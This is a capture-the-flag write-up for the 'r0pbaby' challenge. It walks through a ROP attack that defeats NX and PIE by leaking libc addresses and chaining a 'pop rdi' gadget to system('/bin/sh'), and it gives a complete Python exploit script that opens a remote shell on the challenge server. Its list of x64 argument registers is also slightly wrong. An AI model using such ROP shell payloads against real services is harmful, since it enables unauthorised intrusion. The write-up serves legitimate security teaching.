한국어(Korean): Link


We are given a binary below:

r0pbaby_542ee6516410709a1421141501f03760

As we can notice looking at the name, this is about ROP. Let's check the protections.

As imagined, NX is on and also PIE is.

Run the binary and we can easily find out what to do.

We can fetch the address of any function we want via No.2 and unleash overflow via No.3.

Let's take a look at how overflow occurs using gdb. To debug a PIE binary, you must first set "set stop-on-solib-events 1" option and then set BP after code section is loaded. Also set BP after calling memcpy where overflow occurs.

Our input is directly copied to rbp. So we can think of a payload like this:

dummy [A*8]

Address of "pop %rdi; retq"

Pointer to "/bin/sh"

system function


The reason why we put the address of "/bin/sh" in rdi is because arguments are passed not through stack but through register in x64 in this order:

rdi, rsi, rdx, r10, r9, r8

The first argument goes rdi.


We gotta find "pop rdi; retq" in libc using ROPgadget.

Then let's measure the distance between system and "/bin/sh", "pop %rdi; retq"

system-0x22b1a = 0x23b26 = 146214

Sadly we cannot find "/bin/sh" in libc using find command :( We gotta run a binary.

0x7ffff798dcdb-0x7ffff7857640=1271451

Final exploit code is as follows.

from socket import *
import struct

p = lambda x:struct.pack("<Q", x)

s = socket(2,1)
s.connect(('r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me',10436))

print s.recv(1024) # banner
print s.recv(1024) # menu

s.send('2\n')
print s.recv(1024) # which func?
s.send('system\n')
tmp = s.recv(1024)
print tmp
system_addr = eval(tmp.split(': ')[1])

payload = 'a'*8
payload += p(system_addr-146214) # pop rdi; retq;
payload += p(system_addr+1271451) # "/bin/sh"
payload += p(system_addr)
payload += '\n'

s.send('3\n'+`len(payload)`+'\n'+payload)

print s.recv(1024)
s.send('4\n')
print s.recv(1024)

import telnetlib
tc = telnetlib.Telnet()
tc.sock = s
tc.interact()



Flag: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?

+ Recent posts